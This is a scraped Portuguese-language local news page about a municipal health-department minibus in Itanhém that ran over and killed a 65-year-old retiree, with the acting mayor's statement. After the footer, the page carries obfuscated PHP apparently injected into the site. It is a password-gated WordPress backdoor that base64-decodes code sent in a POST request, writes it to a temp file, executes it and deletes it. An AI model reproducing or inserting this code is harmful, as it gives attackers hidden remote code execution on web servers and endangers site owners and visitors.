• SEJA BEM-VINDO

Micro-ônibus da Secretaria da Saúde de Itanhém atropela e mata aposentado após desembarque

Publicado em: 10/11/2021 Atualizado:: novembro 10, 2021

 

Um aposentado morreu atropelado no inicio da tarde desta terça-feira (9), na região central de Itanhém, por um micro-ônibus da Secretaria da Saúde da prefeitura da cidade. De acordo com familiares, o aposentado morreu no local e foi necessário que populares suspendessem o veículo para retira-lo.

Elenilton Pereira Barreto, de 65 anos, havia chegado no próprio micro-ônibus, da cidade de Teixeira de Freitas, onde passou por exames. Habitualmente os usuários do serviço são deixados próximos as suas residências. Logo depois de desembarcar na Rua Teixeira de Freitas, o aposentado foi atropelado. O micro-ônibus parou logo em seguida, na rua Belo Horizonte.

 

 

O médico e ex-secretário da Saúde Roberto Matoba chegou imediatamente ao local e, juntamente com a equipe do SAMU, prestou os primeiros atendimentos à vítima.

 

Vice-prefeito disse em nota que prestou apoio à família do aposentado que morreu atropelado por micro-ônibus da prefeitura

 

O vice-prefeito e secretário interino da Saúde do município de Itanhém, Alex Chaves, em nota, disse que a secretaria prestou atendimento através do SAMU ao aposentado Elenilton Pereira Barreto, de 65 anos, que morreu atropelado no início da tarde desta terça-feira (9), por um micro-ônibus da prefeitura. Alex é o prefeito em exercício em razão de Mildson Medeiros está em viagem.

 

 

De acordo com familiares, o aposentado havia passado por exames na cidade de Teixeira de Freitas e chegou no próprio micro-ônibus. Ainda de acordo com familiares o aposentado morreu no local, debaixo do veículo.

Diz a nota que o secretário e outros colaboradores da Prefeitura de Itanhém prestaram solidariedade e apoio à família da vítima, “visando a superação desse momento de dor”.

“Estamos aguardando as ações da Polícia Técnica para entender a dinâmica do acidente e eventuais direcionamento legais cabíveis”, finaliza a nota, enfatizando que o prefeito Mildson Medeiros, embora em viagem, “reitera que a família e amigos podem contar com a municipalidade”.

 

Fonte: Aguapretanews


JORNAL INDEPENDENTE


Siga as redes sociais

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}